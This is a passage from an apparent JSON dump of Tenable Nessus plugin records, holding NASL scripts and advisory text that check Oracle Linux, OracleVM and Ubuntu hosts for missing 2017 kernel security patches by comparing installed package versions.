get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-7446\", \"CVE-2015-1420\", \"CVE-2015-4700\", \"CVE-2015-5257\", \"CVE-2015-5707\", \"CVE-2015-6252\", \"CVE-2015-6937\", \"CVE-2015-9731\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-10229\", \"CVE-2016-2782\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-7910\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2583\", \"CVE-2017-2636\", \"CVE-2017-2647\", \"CVE-2017-5669\", \"CVE-2017-5986\", \"CVE-2017-6074\", \"CVE-2017-6214\", \"CVE-2017-6345\", \"CVE-2017-7184\", \"CVE-2017-7187\", \"CVE-2017-7895\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3567\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.295.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.295.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.295.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.295.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.295.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.295.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:06", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - crypto: algif_hash - Only export and import on sockets\n with data (Herbert Xu) [Orabug: 25417805]\n (CVE-2016-8646)\n\n - USB: usbfs: fix potential infoleak in devio (Kangjie Lu)\n [Orabug: 25462760] (CVE-2016-4482)\n\n - net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807]\n (CVE-2016-4485)\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg\n (Rainer Weikusat) [Orabug: 25463996] (CVE-2013-7446)\n\n - unix: avoid use-after-free in ep_remove_wait_queue\n (Rainer Weikusat) [Orabug: 25463996] (CVE-2013-7446)", "edition": 24, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-13T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0040)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4485", "CVE-2016-4482", "CVE-2016-8646", "CVE-2013-7446"], "modified": "2017-02-13T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2017-0040.NASL", "href": "https://www.tenable.com/plugins/nessus/97119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0040.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97119);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8646\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0040)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - crypto: algif_hash - Only export and import on sockets\n with data (Herbert Xu) [Orabug: 25417805]\n (CVE-2016-8646)\n\n - USB: usbfs: fix potential infoleak in devio (Kangjie Lu)\n [Orabug: 25462760] (CVE-2016-4482)\n\n - net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807]\n (CVE-2016-4485)\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg\n (Rainer Weikusat) [Orabug: 25463996] (CVE-2013-7446)\n\n - unix: avoid use-after-free in ep_remove_wait_queue\n (Rainer Weikusat) [Orabug: 25463996] (CVE-2013-7446)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-February/000648.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?995a591b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:N/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.16.3.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.16.3.el7uek]\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417805] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462760] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25463996] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25463996] {CVE-2013-7446}", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-13T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3515)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4485", "CVE-2016-4482", "CVE-2016-8646", "CVE-2013-7446"], "modified": "2017-02-13T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.16.3.el7uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.16.3.el6uek", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3515.NASL", "href": "https://www.tenable.com/plugins/nessus/97117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3515.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97117);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8646\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.16.3.el7uek]\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417805] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462760] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25463996] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25463996] {CVE-2013-7446}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006702.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006703.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:N/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.16.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.16.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-7446\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8646\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3515\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.16.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.16.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.16.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.16.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.16.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.16.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.16.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.16.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.16.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.16.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2020-10-28T10:30:29", "description": "It was discovered that the generic SCSI block layer in the Linux\nkernel did not properly restrict write operations in certain\nsituations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly gain administrative privileges.\n(CVE-2016-10088)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest\nvirtual machine could use this to cause a denial of service (guest OS\ncrash). (CVE-2016-9588)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly gain\nadministrative privileges. (CVE-2017-6074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-22T00:00:00", "title": "Ubuntu 16.10 : linux, linux-raspi2 vulnerabilities (USN-3209-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6074", "CVE-2016-10088", "CVE-2016-9588"], "modified": "2017-02-22T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2", "cpe:/o:canonical:ubuntu_linux:16.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3209-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97324", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3209-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97324);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/27\");\n\n script_cve_id(\"CVE-2016-10088\", \"CVE-2016-9588\", \"CVE-2017-6074\");\n script_xref(name:\"USN\", value:\"3209-1\");\n\n script_name(english:\"Ubuntu 16.10 : linux, linux-raspi2 vulnerabilities (USN-3209-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the generic SCSI block layer in the Linux\nkernel did not properly restrict write operations in certain\nsituations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly gain administrative privileges.\n(CVE-2016-10088)\n\nJim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest\nvirtual machine could use this to cause a denial of service (guest OS\ncrash). (CVE-2016-9588)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly gain\nadministrative privileges. (CVE-2017-6074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3209-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10088\", \"CVE-2016-9588\", \"CVE-2017-6074\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3209-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-1026-raspi2\", pkgver:\"4.8.0-1026.29\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-39-generic\", pkgver:\"4.8.0-39.42\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-39-generic-lpae\", pkgver:\"4.8.0-39.42\")) flag++;\nif (ubuntu_check(osver:\"16.10\", 